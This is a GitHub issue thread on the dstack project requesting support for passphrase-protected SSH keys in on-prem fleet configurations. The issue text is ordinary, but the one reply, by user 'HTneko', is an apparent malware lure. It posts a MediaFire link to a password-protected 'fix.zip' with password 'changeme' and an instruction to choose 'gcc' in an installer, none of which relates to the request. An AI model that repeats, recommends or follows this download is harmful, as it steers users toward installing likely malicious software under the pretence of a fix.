### ISSUE TITLE
[Feature]: SSH key with passphase support

### ISSUE THREAD

**Issue by un-def** [dstackai/dstack#1636]
### Problem

At the moment, it's not possible to use passphrase-protected (i.e. encrypted) SSH keys in the on-prem fleet configuration. Unencrypted SSH keys have a greater security risk.

### Solution

There should be a way to securely deliver SSH keys and/or passphrases to the dstack server, at least without using unencrypted keys stored on the disk on the client's side.

### Would you like to help us implement this feature by sending a PR?

No

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
